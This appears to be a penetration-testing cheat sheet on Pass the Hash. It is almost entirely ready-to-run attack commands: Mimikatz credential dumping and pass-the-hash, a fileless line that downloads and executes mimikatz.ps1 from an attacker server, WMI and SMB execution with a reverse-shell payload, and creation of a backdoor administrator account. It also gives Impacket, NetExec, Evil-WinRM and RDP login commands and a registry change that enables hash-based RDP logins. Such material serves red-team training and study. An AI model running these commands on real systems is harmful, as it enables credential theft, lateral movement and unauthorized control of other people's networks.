Skip to main content

Pass the Hash (PtH)

Pass the Hash (PtH) is a technique where an attacker uses hashed credentials (password hashes) to authenticate and gain access to a computer or network, bypassing password authentication.

We can obtain hashes from the following (but not limited to) sources:

  • Local SAM database
  • NTDS.dit database
  • Memory (lsass.exe)
  • Registry hives (SAM and SYSTEM files)
  • Cached domain credentials
  • LSA secrets
  • Network sniffing (NTLM hashes)

From Windows

Mimikatz

Dump Hashes

sekurlsa::logonpasswords
lsadump::sam

Or follow other techniques if not mikikatz.

PtH

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH

After doing so, It should pop up, cmd.exe for that user, and we can access their directory using command like dir \\dc01\rezy.

Example

sekurlsa::pth /user:rezy /domain:rezydev.xyz /ntlm:<HASH>
mimikatz.exe privilege::debug "sekurlsa::pth /user:rezy /ntlm:d41d8cd98f00b204e9800998ecf8427e /domain:rezydev.xyz /run:cmd.exe" exit

Fileless

IEX (New-Object Net.WebClient).DownloadString('http://<SELF-HOSTED-SERVER-IP>/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::pth /user:rezy /domain:rezydev.xyz /ntlm:hash /run:powershell.exe'

PowerShell Invoke-TheHash

WMI

Import-Module .\Invoke-TheHash.psd1

# Reverse Shell:
Invoke-WMIExec -Target 10.10.10.10 -Domain rezydev.xyz -Username rezy -Hash <HASH> -Command "PowerShell #3 (Base64) Payload Here"
# Use PowerShell #3 (Base64) from https://www.revshells.com/

SMB

Import-Module .\Invoke-TheHash.psd1

# Following command adds a new user 'jethalal'
Invoke-SMBExec -Target 10.10.10.10 -Domain rezydev.xyz -Username rezy -Hash <HASH> -Command "OUR COMMAND HERE, EITHER ADD A NEW USER OR GET A REVERSE SHELL" -Verbose
Invoke-SMBExec -Target 10.10.10.10 -Domain rezydev.xyz -Username rezy -Hash d41d8cd98f00b204e9800998ecf8427e -Command "net user jethalal Coolpass123 /add && net localgroup administrators jethalal /add" -Verbose

From Linux

Impacket

python3 /opt/impacket/build/scripts-3.12/psexec.py -hashes <HASH>: -target 10.10.10.10 -domain rezydev.xyz -user rezy
warning
  • HASH: is used to represent the LM hash when the NT hash is being specified after the colon.
  • :HASH represents the NT hash, with no LM hash value provided before the colon.

NetExec

nxc smb 10.10.10.10 -u <username> -H <HASH> -d rezydev.xyz
info

Use --local-auth in NetExec/CrackMapExec to authenticate to each host in a subnet using the local administrator password hash.

success

We can use -x COMMAND in NetExec/CrackMapExec to execute commands.

Evil-WinRM

evil-winrm -i 10.10.10.10 -u Administrator -H <HASH-HERE>

RDP

xfreerdp /v:10.10.10.10 /u:Administrator /pth:<HASH-HERE>
warning

Enable Restricted Admin Mode (off by default) by setting DisableRestrictedAdmin (REG_DWORD) to 0 under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa to use Pass-the-Hash with RDP.

We can enable it using following command:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f